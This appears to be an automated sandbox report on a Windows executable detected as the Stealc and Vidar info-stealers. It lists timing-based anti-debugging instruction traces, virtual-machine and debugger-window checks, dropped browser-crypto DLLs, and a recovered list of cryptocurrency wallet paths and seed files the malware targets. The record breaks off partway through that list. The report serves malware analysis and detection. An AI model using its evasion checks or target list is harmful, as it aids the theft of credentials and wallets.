              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F76629 second address: F76634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C557 second address: F8C565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C565 second address: F8C58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F403C75C91Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F403C75C904h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C58A second address: F8C595 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C6B9 second address: F8C6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C6BE second address: F8C6C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C6C4 second address: F8C6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C6CA second address: F8C6CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C6CE second address: F8C6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C6D4 second address: F8C710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jc 00007F403D12A5D2h 0x0000000f jmp 00007F403D12A5BFh 0x00000014 jmp 00007F403D12A5BDh 0x00000019 pushad 0x0000001a jmp 00007F403D12A5BCh 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C9AE second address: F8C9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C9B6 second address: F8C9BF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8C9BF second address: F8C9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F403C75C906h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8CF59 second address: F8CF5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8D0AC second address: F8D0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8FDA0 second address: F8FDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F8FFD6 second address: F8FFDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F902AC second address: F902C1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F403D12A5B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F902C1 second address: F902E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F403C75C8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F403C75C8F6h 0x00000011 pop eax 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F403C75C8FFh 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F92CEE second address: F92CF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: F94D3F second address: F94D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F403C75C8F6h 0x0000000a popad 0x0000000b jl 00007F403C75C906h 0x00000011 jmp 00007F403C75C900h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0274 second address: 55B0278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0278 second address: 55B0294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C908h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0294 second address: 55B02C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 push ebx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esp 0x0000000c jmp 00007F403D12A5C4h 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx edi, cx 0x0000001a mov di, si 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B02C1 second address: 55B02FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C8FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F403C75C8FBh 0x00000013 call 00007F403C75C908h 0x00000018 pop eax 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B02FA second address: 55B0300 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B03A2 second address: 55B03E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F403C75C905h 0x00000015 add ecx, 2221A5C6h 0x0000001b jmp 00007F403C75C901h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B044B second address: 55B044F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B044F second address: 55B0462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C8FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0462 second address: 55B0474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push ebx 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0474 second address: 55B0478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0478 second address: 55B047E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0582 second address: 55B05E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C8FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a and dword ptr [ebp-04h], 00000000h 0x0000000e jmp 00007F403C75C900h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007F403C75C8FDh 0x0000001e pop eax 0x0000001f pushfd 0x00000020 jmp 00007F403C75C901h 0x00000025 add esi, 6B7C4FA6h 0x0000002b jmp 00007F403C75C901h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B05E4 second address: 55B0619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b jmp 00007F403D12A5BEh 0x00000010 mov al, byte ptr [edx] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F403D12A5BAh 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0619 second address: 55B061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B061F second address: 55B0625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0625 second address: 55B0619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C908h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc edx 0x0000000c jmp 00007F403C75C900h 0x00000011 test al, al 0x00000013 jmp 00007F403C75C900h 0x00000018 jne 00007F403C75C893h 0x0000001e mov al, byte ptr [edx] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F403C75C8FAh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B072D second address: 55B0778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F403D12A5C7h 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov al, byte ptr [edi+01h] 0x00000011 pushad 0x00000012 mov ebx, 16570154h 0x00000017 pushfd 0x00000018 jmp 00007F403D12A5BDh 0x0000001d jmp 00007F403D12A5BBh 0x00000022 popfd 0x00000023 popad 0x00000024 inc edi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0778 second address: 55B077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B077C second address: 55B0782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0782 second address: 55B07AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403C75C8FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F403C75C907h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B07AB second address: 55B0851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007F403D12A5C0h 0x0000000c xor eax, 25C249C8h 0x00000012 jmp 00007F403D12A5BBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jne 00007F40AE86285Eh 0x00000021 jmp 00007F403D12A5C6h 0x00000026 mov ecx, edx 0x00000028 jmp 00007F403D12A5C0h 0x0000002d shr ecx, 02h 0x00000030 jmp 00007F403D12A5C0h 0x00000035 rep movsd 0x00000037 rep movsd 0x00000039 rep movsd 0x0000003b rep movsd 0x0000003d rep movsd 0x0000003f pushad 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007F403D12A5BCh 0x00000047 add al, FFFFFFB8h 0x0000004a jmp 00007F403D12A5BBh 0x0000004f popfd 0x00000050 push ecx 0x00000051 pop ebx 0x00000052 popad 0x00000053 call 00007F403D12A5C4h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B0851 second address: 55B089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ecx, edx 0x00000008 jmp 00007F403C75C907h 0x0000000d and ecx, 03h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F403C75C904h 0x00000017 add si, 35A8h 0x0000001c jmp 00007F403C75C8FBh 0x00000021 popfd 0x00000022 pushad 0x00000023 push esi 0x00000024 pop edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\test.exeRDTSC instruction interceptor: First address: 55B09EB second address: 55B0A02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F403D12A5C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\test.exeSpecial instruction interceptor: First address: CFFA67 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exeSpecial instruction interceptor: First address: CFFB66 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exeSpecial instruction interceptor: First address: EB5BE9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exeSpecial instruction interceptor: First address: CFFA80 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exeSpecial instruction interceptor: First address: F32D73 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\test.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\test.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\test.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\test.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\test.exeAPI coverage: 0.8 %
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCCC930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,0_2_6CCCC930
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\test.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: test.exe, test.exe, 00000000.00000002.1455992478.0000000000E84000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: test.exe, 00000000.00000002.1456721417.00000000017D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: test.exe, 00000000.00000002.1456721417.00000000017E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs
              Source: test.exe, 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: test.exe, 00000000.00000002.1456721417.0000000001802000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000000.00000003.1362964366.0000000001803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: test.exe, 00000000.00000002.1455992478.0000000000E84000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\test.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\test.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\test.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\test.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\test.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\test.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\test.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\test.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\test.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\test.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\test.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\test.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\test.exeFile opened: SICE
              Source: C:\Users\user\Desktop\test.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\test.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\test.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\test.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CD15FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6CD15FF0
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCB3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6CCB3480
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCEB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CCEB66C
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCEB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CCEB1F7
              Source: C:\Users\user\Desktop\test.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR
              Source: test.exe, test.exe, 00000000.00000002.1455992478.0000000000E84000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: z@Program Manager
              Source: test.exe, 00000000.00000002.1455992478.0000000000E84000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: z@Program Managerq
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCEB341 cpuid 0_2_6CCEB341
              Source: C:\Users\user\Desktop\test.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\test.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\test.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\test.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\test.exeCode function: 0_2_6CCB35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6CCB35A0

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.1455667853.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1456721417.000000000178E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1168966295.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Yara detected Vidar stealer
              Source: Yara matchFile source: Process Memory Space: test.exe PID: 7748, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: test.exe, 00000000.00000002.1455667853.0000000000B34000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger 